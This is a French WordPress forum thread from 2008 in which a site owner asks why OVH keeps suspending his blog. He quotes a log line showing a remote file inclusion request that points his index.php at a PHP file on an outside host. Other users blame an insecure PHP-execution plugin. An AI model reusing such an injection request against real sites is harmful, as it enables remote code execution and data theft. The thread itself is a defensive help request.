Tentative de piratage (Créer un compte)

  • Statut : non résolu
6 sujets de 1 à 6 (sur un total de 6)
  • Auteur
    Messages
  • #456513
    Alx
    Participant
    Initié WordPress
    3 contributions

    Bonjour,

    Ma configuration WP actuelle
    – Version de WordPress : 2.3.2
    – Thème utilisé : celui qui ressemble à un mac
    – Plugins en place : trop p’tet !! phpExec…
    – Nom de l’hebergeur : OVH
    – Adresse du site : http://www.puzzlemaniak.com

    Problème(s) rencontré(s) :

    Et bien voilà, ca fait 3 jours qu’OVH me ferme mon site.
    Hier j’ai mis wordpress à jour (2.3.2) mais c’est revenu.

    Les logs m’ont permis de voir les requetes qui posent probleme, en voici un exemple :

    m08s31da.ispgateway.de http://www.puzzlemaniak.com – [18/Jan/2008:00:33:42 +0100] « GET /blog/index.php?url=http://forum.juggla.net/images/avatars/.as./figo.txt?? HTTP/1.1 » 200 30689 « – » « libwww-perl/5.808 »

    le fichier (…) »figo.txt » contient du code php qui tente des truycs que je ne comprends pas specialement, mais qui font chier mon hebergeur donc.

    que puis-je y faire ?
    un .htaccess ne donnera rien car l’abruti qui essaye de faire cela n’est pas seul (ou a plusieurs machines) donc je ne peux filtrer les ip…

    Cordialement,
    Alx

    #618804
    skinnymcgee
    Membre
    Padawan WordPress
    70 contributions

    Salut,

    Est ce que t’es déja allé sur ce forum?

    http://forum.juggla dot net

    car on dirai que c’est un spam, ou un mauvais script qui vient de ce forum.
    C’est assez bizarre..

    Après faut voir avec les autres membres si quelqu’un comprend ce script…
    Sinon essaie de bannir tout ce qui peux venir de l’adresse de ce forum, mais ça je ne sais pas du tout si c’est possible 🙂

    #618805
    tampons encreurs
    Membre
    Initié WordPress
    47 contributions

    Il faut soit abandonner ton plugin phpExec, soit installer une version qui empêche l’exécution de code externe. Car manifestement, ce plugin permet à n’importe qui de faire exécuter n’importe quel code PHP sur ton hébergement, y compris un code qui puisera sur ton espace d’hébergement son contenu, ses mots de passes, sa base de données, de tout effacer ou… de spammer le monde entier, l’usage le plus courant.

    Bref, en le laissant en l’état, tu permets à des millions de spammeurs du monde entier de spammer le reste du monde et participes directement à leur effort de guerre.

    #618806
    Alx
    Participant
    Initié WordPress
    3 contributions

    oui ca semble bien etre LE probleme en effet ‘tampons encreurs’, merci bien pour la reponse !!!

    j’ai vraiment besoin d’inserer du code php dans mon blog

    je sui svraiment embété là, pfffffffffff

    comment puis-je m’en sortir ?
    y’a-t’il d’autres plugin que execphp pour faire cela ?
    et plus sur surtout !!!

    d’avance merci pour l’aide

    Alx

    #618807
    Alx
    Participant
    Initié WordPress
    3 contributions

    pas d’idees pour moi ?

    #618808
    bastienh
    Participant
    Initié WordPress
    12 contributions

    ça fonctionne si tu actives le plug-in juste
    lors de la saisie de l’article ?

    sinon lorsque tu utilises du php, enregistre le via l’administration SQL…

    pas genial malgré tout :s

6 sujets de 1 à 6 (sur un total de 6)
  • Vous devez être connecté pour répondre à ce sujet.